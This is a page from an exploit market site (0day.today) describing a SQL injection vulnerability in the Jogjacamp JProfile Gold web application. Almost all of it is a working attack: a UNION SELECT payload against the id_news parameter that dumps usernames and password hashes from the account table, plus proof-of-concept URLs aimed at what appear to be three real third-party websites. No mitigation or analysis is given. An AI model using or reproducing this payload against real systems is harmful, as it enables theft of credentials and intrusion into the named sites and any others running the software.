[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability

Author
kecemplungkalen
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4909
Category
web applications
Date add
03-03-2009
Platform
unsorted
====================================================================
Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability
====================================================================


###############################################################


Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen 

Vendor  : http://jogjacamp.com

bugs	: /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC	: http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################



#  0day.today [2024-09-28]  #